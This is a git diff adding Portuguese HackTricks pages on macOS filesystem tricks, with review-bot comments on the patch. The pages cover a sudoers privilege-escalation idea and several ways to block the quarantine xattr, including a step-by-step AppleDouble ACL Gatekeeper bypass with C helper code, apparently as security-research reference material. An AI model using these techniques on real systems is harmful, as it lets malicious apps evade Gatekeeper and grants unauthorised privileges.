diff --git a/SUMMARY.md b/SUMMARY.md index 0fcee7252..edec6b1ad 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -189,7 +189,8 @@ * [macOS TCC Bypasses](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md) * [macOS Apple Scripts](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md) * [macOS Dangerous Entitlements & TCC perms](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md) - * [macOS FS Tricks](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks.md) + * [macOS FS Tricks](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md) + * [macOS xattr-acls extra stuff](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md) * [macOS Users](macos-hardening/macos-security-and-privilege-escalation/macos-users.md) * [macOS Red Teaming](macos-hardening/macos-red-teaming/README.md) * [macOS MDM](macos-hardening/macos-red-teaming/macos-mdm/README.md) diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md new file mode 100644 index 000000000..9e8f56175 --- /dev/null +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md @@ -0,0 +1,113 @@ +# Truques do macOS FS + +
+ +☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 + +* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! +* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) +* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com) +* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud). + +
+ +## FD Arbitrário + +Se você pode fazer um **processo abrir um arquivo ou uma pasta com privilégios elevados**, você pode abusar do **`crontab`** para abrir um arquivo em `/etc/sudoers.d` com **`EDITOR=exploit.py`**, assim o `exploit.py` obterá o FD para o arquivo dentro de `/etc/sudoers` e o abusará. + +Por exemplo: [https://youtu.be/f1HA5QhLQ7Y?t=21098](https://youtu.be/f1HA5QhLQ7Y?t=21098) + +## Truques para evitar atributos de quarentena + +### Flag uchg + +Se um arquivo/pasta tiver esse atributo imutável, não será possível colocar um xattr nele. +```bash +echo asd > /tmp/asd +chflags uchg /tmp/asd +xattr -w com.apple.quarantine "" /tmp/asd +xattr: [Errno 1] Operation not permitted: '/tmp/asd' + +ls -lO /tmp/asd +# check the "uchg" in the output +``` +### Montagem do defvfs + +Uma montagem do **devfs** **não suporta xattr**, mais informações em [**CVE-2023-32364**](https://gergelykalman.com/CVE-2023-32364-a-macOS-sandbox-escape-by-mounting.html) +```bash +mkdir /tmp/mnt +mount_devfs -o noowners none "/tmp/mnt" +chmod 777 /tmp/mnt +mkdir /tmp/mnt/lol +xattr -w com.apple.quarantine "" /tmp/mnt/lol +xattr: [Errno 1] Operation not permitted: '/tmp/mnt/lol' +``` +### ACL writeextattr + +Esta ACL impede a adição de `xattrs` ao arquivo. +```bash +rm -rf /tmp/test* +echo test >/tmp/test +chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" /tmp/test +ls -le /tmp/test +ditto -c -k test test.zip +# Download the zip from the browser and decompress it, the file should be without a quarantine xattr + +cd /tmp +echo y | rm test + +# Decompress it with ditto +ditto -x -k --rsrc test.zip . +ls -le /tmp/test + +# Decompress it with open (if sandboxed decompressed files go to the Downloads folder) +open test.zip +sleep 1 +ls -le /tmp/test +``` +### **com.apple.acl.text xattr + AppleDouble** + +O formato de arquivo **AppleDouble** copia um arquivo incluindo suas ACEs. 
+ +No [**código-fonte**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html), é possível ver que a representação de texto do ACL armazenada dentro do xattr chamado **`com.apple.acl.text`** será definida como ACL no arquivo descompactado. Portanto, se você comprimir um aplicativo em um arquivo zip com o formato de arquivo **AppleDouble** com um ACL que impede que outros xattrs sejam gravados nele... o xattr de quarentena não será definido no aplicativo: + +Verifique o [**relatório original**](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/) para obter mais informações. + +Para replicar isso, primeiro precisamos obter a string de acl correta: +```bash +# Everything will be happening here +mkdir /tmp/temp_xattrs +cd /tmp/temp_xattrs + +# Create a folder and a file with the acls and xattr +mkdir del +mkdir del/test_fold +echo test > del/test_fold/test_file +chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" del/test_fold +chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" del/test_fold/test_file +ditto -c -k del test.zip + +# uncomporess to get it back +ditto -x -k --rsrc test.zip . +ls -le test +``` +(Note que mesmo que isso funcione, a sandbox escreve o atributo de quarentena antes) + +Não é realmente necessário, mas eu deixo aqui caso seja necessário: + +{% content-ref url="macos-xattr-acls-extra-stuff.md" %} +[macos-xattr-acls-extra-stuff.md](macos-xattr-acls-extra-stuff.md) +{% endcontent-ref %} + +
+ +☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 + +* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! +* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) +* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com) +* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo Telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud). + +
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md new file mode 100644 index 000000000..1b8f7da04 --- /dev/null +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md @@ -0,0 +1,194 @@ +# Recursos adicionais de xattr-acls do macOS + +
+ +☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 + +* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? Ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! +* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) +* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com) +* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo Telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud). + +
+```bash +rm -rf /tmp/test* +echo test >/tmp/test +chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" /tmp/test +./get_acls test +ACL for test: +!#acl 1 +group:ABCDEFAB-CDEF-ABCD-EFAB-CDEF0000000C:everyone:12:deny:write,writeattr,writeextattr,writesecurity,chown + +ACL in hex: \x21\x23\x61\x63\x6c\x20\x31\x0a\x67\x72\x6f\x75\x70\x3a\x41\x42\x43\x44\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x2d\x41\x42\x43\x44\x2d\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x30\x30\x30\x30\x30\x30\x30\x43\x3a\x65\x76\x65\x72\x79\x6f\x6e\x65\x3a\x31\x32\x3a\x64\x65\x6e\x79\x3a\x77\x72\x69\x74\x65\x2c\x77\x72\x69\x74\x65\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x65\x78\x74\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x73\x65\x63\x75\x72\x69\x74\x79\x2c\x63\x68\x6f\x77\x6e\x0a +``` +
+ +Código de get_acls +```c +// gcc -o get_acls get_acls +#include +#include +#include + +int main(int argc, char *argv[]) { +if (argc != 2) { +fprintf(stderr, "Usage: %s \n", argv[0]); +return 1; +} + +const char *filepath = argv[1]; +acl_t acl = acl_get_file(filepath, ACL_TYPE_EXTENDED); +if (acl == NULL) { +perror("acl_get_file"); +return 1; +} + +char *acl_text = acl_to_text(acl, NULL); +if (acl_text == NULL) { +perror("acl_to_text"); +acl_free(acl); +return 1; +} + +printf("ACL for %s:\n%s\n", filepath, acl_text); + +// Convert acl_text to hexadecimal and print it +printf("ACL in hex: "); +for (char *c = acl_text; *c != '\0'; c++) { +printf("\\x%02x", (unsigned char)*c); +} +printf("\n"); + +acl_free(acl); +acl_free(acl_text); +return 0; +} +``` +
+```bash +# Lets add the xattr com.apple.xxx.xxxx with the acls +mkdir start +mkdir start/protected +./set_xattr start/protected +echo something > start/protected/something +``` +
+ +Código de set_xattr +```c +// gcc -o set_xattr set_xattr.c +#include +#include +#include +#include +#include + + +void print_xattrs(const char *filepath) { +ssize_t buflen = listxattr(filepath, NULL, 0, XATTR_NOFOLLOW); +if (buflen < 0) { +perror("listxattr"); +return; +} + +char *buf = malloc(buflen); +if (buf == NULL) { +perror("malloc"); +return; +} + +buflen = listxattr(filepath, buf, buflen, XATTR_NOFOLLOW); +if (buflen < 0) { +perror("listxattr"); +free(buf); +return; +} + +printf("All current extended attributes for %s:\n", filepath); +for (char *name = buf; name < buf + buflen; name += strlen(name) + 1) { +printf("%s: ", name); +ssize_t valuelen = getxattr(filepath, name, NULL, 0, 0, XATTR_NOFOLLOW); +if (valuelen < 0) { +perror("getxattr"); +continue; +} + +char *value = malloc(valuelen + 1); +if (value == NULL) { +perror("malloc"); +continue; +} + +valuelen = getxattr(filepath, name, value, valuelen, 0, XATTR_NOFOLLOW); +if (valuelen < 0) { +perror("getxattr"); +free(value); +continue; +} + +value[valuelen] = '\0'; // Null-terminate the value +printf("%s\n", value); +free(value); +} + +free(buf); +} + + +int main(int argc, char *argv[]) { +if (argc != 2) { +fprintf(stderr, "Usage: %s \n", argv[0]); +return 1; +} + +const char *hex = "\x21\x23\x61\x63\x6c\x20\x31\x0a\x67\x72\x6f\x75\x70\x3a\x41\x42\x43\x44\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x2d\x41\x42\x43\x44\x2d\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x30\x30\x30\x30\x30\x30\x30\x43\x3a\x65\x76\x65\x72\x79\x6f\x6e\x65\x3a\x31\x32\x3a\x64\x65\x6e\x79\x3a\x77\x72\x69\x74\x65\x2c\x77\x72\x69\x74\x65\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x65\x78\x74\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x73\x65\x63\x75\x72\x69\x74\x79\x2c\x63\x68\x6f\x77\x6e\x0a"; +const char *filepath = argv[1]; + +int result = setxattr(filepath, "com.apple.xxx.xxxx", hex, strlen(hex), 0, 0); +if (result == 0) { +printf("Extended attribute set successfully.\n\n"); +} else { +perror("setxattr"); +return 1; +} + +print_xattrs(filepath); + 
+return 0; +} +``` +
+ +{% code overflow="wrap" %} +```bash +# Create appledoublefile with the xattr entitlement +ditto -c -k start protected.zip +rm -rf start +# extract the files +unzip protected.zip +# Replace the name of the xattr here (if you put it before ditto would have destroyed it) +python3 -c "with open('._protected', 'rb+') as f: content = f.read().replace(b'com.apple.xxx.xxxx', b'com.apple.acl.text'); f.seek(0); f.write(content); f.truncate()" +# zip everything back together +rm -rf protected.zip +zip -r protected.zip protected ._protected +rm -rf protected +rm ._* +``` +{% endcode %} +```bash +# Check if it worked +ditto -x -k --rsrc protected.zip . +xattr -l protected +``` +
+ +☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 + +* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! +* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) +* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com) +* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud). + +
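Review bot: The SUMMARY.md hunk repoints "macOS FS Tricks" from `macos-fs-tricks.md` to `macos-fs-tricks/README.md`, but the rest of the patch adds that README as `new file mode 100644` from `/dev/null` and contains no deletion or rename hunk for the old `macos-fs-tricks.md`; confirm the old file is removed (otherwise it stays as an orphan with duplicated content) and that any other pages linking to `macos-fs-tricks.md` are updated to the new directory path.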
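Review bot: In the README.md hunk, the "ACL writeextattr" block runs `ditto -c -k test test.zip` before the `cd /tmp` line while the file was created as `/tmp/test`, so the sequence only works if the reader already happens to be in `/tmp`; move `cd /tmp` above the first `ditto` call (or use absolute paths) so the block runs as written. Same hunk, smaller points: the heading `### Montagem do defvfs` misspells devfs (the body and the `mount_devfs` command use the correct name); the comment `# uncomporess to get it back` has a typo; the closing sentence "Não é realmente necessário, mas eu deixo aqui caso seja necessário" repeats itself and could be shortened to one clause; and the caveat "(Note que mesmo que isso funcione, a sandbox escreve o atributo de quarentena antes)" is the key limitation of the AppleDouble technique, so it reads better at the start of that section than buried after the code.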
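Review bot: In the macos-xattr-acls-extra-stuff.md hunk, both C sources will not compile as shown: every `#include` line is empty and the usage strings read `"Usage: %s \n"`, which looks like the angle-bracketed text (`<stdio.h>`, `<sys/acl.h>` for get_acls, `<sys/xattr.h>` for set_xattr, and the `<file>` placeholder) was stripped by the rendering pipeline; restore the header names (escaping `<`/`>` if GitBook eats them inside the fence). The build comment `// gcc -o get_acls get_acls` is also missing the `.c` suffix (compare `// gcc -o set_xattr set_xattr.c`). Two further points in the same hunk: the `python3 -c` one-liner that rewrites `com.apple.xxx.xxxx` to `com.apple.acl.text` inside `._protected` only keeps the AppleDouble entry offsets valid because both names are exactly 18 bytes, which deserves a comment so nobody swaps in a placeholder of a different length and corrupts the file; and `rm ._*` deletes every AppleDouble file in the working directory rather than just `._protected`. Finally, the page opens directly with a code block after the banner; a one-sentence lead saying it shows how the `com.apple.acl.text` xattr is built and smuggled through an AppleDouble archive would help readers arriving from the README link.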